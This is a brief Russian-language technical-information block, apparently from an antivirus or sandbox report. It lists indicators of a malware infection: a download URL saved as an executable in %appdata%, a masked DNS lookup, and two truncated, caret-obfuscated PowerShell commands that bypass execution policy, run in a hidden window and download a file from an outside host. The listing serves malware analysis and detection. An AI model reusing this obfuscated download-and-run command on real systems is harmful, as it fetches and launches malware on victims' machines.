Техническая информация
- http://vvorootad.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWErsheL^L.^e^X^e -^exEcUTi^o^N^Pol^iCy^ B^y^P^A^ss^ ^-^no^p^R^ofILE^ -^WIndOW^st^yl^E^ ^HiDDE^N (^ne^W-^Ob^je^C^T sYStEm.NET.^WEbcL^iENt).^d^oWN^lo^adFIle(^'http://vvorootad...
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /c "pOWErsheL^L.^e^X^e -^exEcUTi^o^N^Pol^iCy^ B^y^P^A^ss^ ^-^no^p^R^ofILE^ -^WIndOW^st^yl^E^ ^HiDDE^N (^ne^W-^Ob^je^C^T sYStEm.NET.^WEbcL^iENt).^d^oWN^lo^adFIle(^'http://vvorootad...' (со скрытым окном)